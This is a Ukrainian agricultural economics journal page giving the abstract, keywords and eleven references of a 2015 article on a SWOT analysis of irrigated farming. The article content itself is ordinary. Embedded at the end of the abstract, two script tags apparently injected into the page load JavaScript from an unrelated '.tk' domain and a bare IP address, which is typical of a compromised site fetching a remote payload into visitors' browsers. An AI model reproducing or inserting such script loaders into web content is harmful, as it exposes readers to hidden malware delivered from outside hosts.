ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.67
Економіка агропромислового виробництва

SWOT-аналіз розвитку зрошуваного землеробства в Україні / Дідковська Л. І. // Економіка АПК. - 2015. - № 5 - С. 33

У розрізі глобалізаційних процесів та необхідності забезпечення продовольчої безпеки у довгостроковій перспективі зосереджується увага на необхідності відродження зрошуваного землеробства. Проаналізовано потенціал розвитку зрошуваного землеробства в Україні за допомогою використання одного з інструментів стратегічного управління – SWOT-аналізу. Визначено, що до основних сильних сторін і можливостей розвитку зрошуваного землеробства належать: висока продуктивність поливного гектара й наявність різних природно-кліматичних зон; перехід від традиційних видів зрошення до локальних способів поливу, низьконапірного дощування та точного землеробства; використання альтернативних джерел води й енергії для поливу. До основних слабких сторін і загроз досліджуваного процесу віднесено: відсутність належної державної підтримки та незадовільний стан матеріально-технічного забезпечення; обмеженість фінансування заходів з відновлення гідромеліоративної системи, дефіцит водних ресурсів; зростання цін на енергоносії; надмірна зарегульованість процесу одержання дозволів на використання водних ресурсів. Встановлено, що при поєднанні сильних сторін і втіленні можливостей, а також при мінімізації або нівелюванні слабких сторін та загроз, зрошуване землеробство може стати надійним гарантом одержання сталих урожаїв. Рис.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: SWOT-аналіз, зрошуване землеробство, меліоративні системи, дощування, краплинне зрошення, технічне забезпечення

Список використаних джерел

 1. Агробізнес України [Електронний ресурс]. – Доступний з: <http://businessviews.com.ua/ru/economy/id/20-grafikov-i-kart-kotorye-dostupno-objasnjajut-agrobiznes-ukrainy-328>.
 2. Наукові основи охорони та раціонального використання зрошуваних земель України; за наук. ред. С.А. Балюка, М.І. Ромащенка, В.А. Сташука. – К.: Аграр. наука, 2009. – 620 с.
 3. Новости аграрных рынков [Електронний ресурс]. – Доступний з: <http://uga-port.org.ua/sites/default/files/23.01.2015._press_overview.pdf>.
 4. Ромащенко М.І. Концептуальні засади відновлення зрошення у південному регіоні України / М.І. Ромащенко // Меліорація і водне господарство. – 2013. – Вип. 100. – Т. 1. – С. 7-17.
 5. Ромащенко М.І. Краплинне зрошення сільськогосподарських культур: сучасний стан та перспективи розвитку в Україні / М.І. Ромащенко, А.П. Шатковський // Матер. ІІ наук.-практ. конф. [“Краплинне зрошення як основна складова інтенсивних агротехнологій XXІ ст.”], (Київ, 4 грудня 2014 р.), Ін-т водн. пробл. і меліор. НААН. – К.: ІВПіМ НААНУ, 2014. – С. 3-7.
 6. Ромащенко М.І. Тенденції розвитку системи краплинного зрошення / М.І. Ромащенко, А.П. Шатковський [Електронний ресурс]. – Доступний з: <http://www.agro-business.com.ua>.
 7. Albinson B., Perry C. J. Fundamentals of Smallholder Irrigation: The Structured System Concept // Research Report 58. – Sri Lanka: IWM. – 2002. – 30 р.
 8. AQUASTAT database [Електронний ресурс]. – Доступний з: <http://www.fao.org>.
 9. Bindi M. The responses of agriculture in Europe to climate change / M. Bindi, J. Olesen // Regional Environmental. – 2011. – № 11. – P. 151-158.
 10. Didkovska L. Reduction of Ukraine’s economy energy dependence using raw material resources of the agricultural sector / L. Didkovska // Buletinul Ştiinţific al Universităţii de Stat „Bogdan Petriceicu Hasdeu”. Seria: economice. – Cahul: USCh. – 2014. – №2(12). – P. 11-19.
 11. Hryuninher M., Cramon S. Competitive agriculture or state control: Ukraine response to the global food crisis [Електронний ресурс]. – Доступний з: <http://www-wds.worldbank.org/>.
Читати статтю: 15_05_33-38.pdf